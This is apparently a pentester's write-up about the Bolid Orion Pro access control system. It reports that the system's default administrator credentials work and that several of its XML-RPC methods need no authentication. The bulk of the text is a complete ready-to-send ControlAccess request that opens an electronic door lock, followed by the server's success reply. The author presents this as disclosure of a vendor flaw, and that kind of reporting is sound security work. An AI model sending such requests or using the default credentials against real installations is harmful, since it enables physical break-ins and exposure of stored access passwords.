Once during a pentest on one of the hosts on WI-FI network I discovered a lot of open ports (XML-RPC).
The server kindly answered the garbage I had send:
BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10
A bit of googling and I find out that this is an access control system АРМ «Орион Про» of security company ЗАО НВП «Болид».
After reading the documentation I tried the ADMINISTRATOR:ORION on XML-RPC. Success. You can manage the system and the database. But this story is not about that.
What if there was a strong password?
In such an unimaginable case you could use XML-RPC methods that do not require authentication. For example, GetPasswordListWithStatus, GetKeyFullInformation, GetDeviceListAsync, ControlAccess, etc.
If you want you may open the door via request:
GET / HTTP/1.1
Host: x.x.x.x:8080
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,ru-RU;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Type: application/xml
Content-Length: 1467
<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
<methodName>ControlAccess</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>ComPort</name>
<value>
<int>3</int>
</value>
</member>
<member>
<name>PKUAddress</name>
<value>
<int>0</int>
</value>
</member>
<member>
<name>DeviceAddress</name>
<value>
<int>5</int>
</value>
</member>
<member>
<name>AggregateAddress</name>
<value>
<int>1</int>
</value>
</member>
<member>
<name>Command</name>
<value>
<int>7</int>
</value>
</member>
<member>
<name>MethodNameForAnswer</name>
<value>
<string>Result</string>
</value>
</member>
<member>
<name>IPSERVER</name>
<value>
<string>y.y.y.y</string>
</value>
</member>
<member>
<name>PORTSERVER</name>
<value>
<int>7777</int>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Viola! Electronic lock is opened!
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 298
Content-Type: text/xml
Content-MD5: 5si9s8913Zio3EUFMy7mww==
Server: BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10
<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member>
<name>Result</name>
<value><boolean>1</boolean></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
The company believes that authentication is not required in access control software. Why do we need such security products?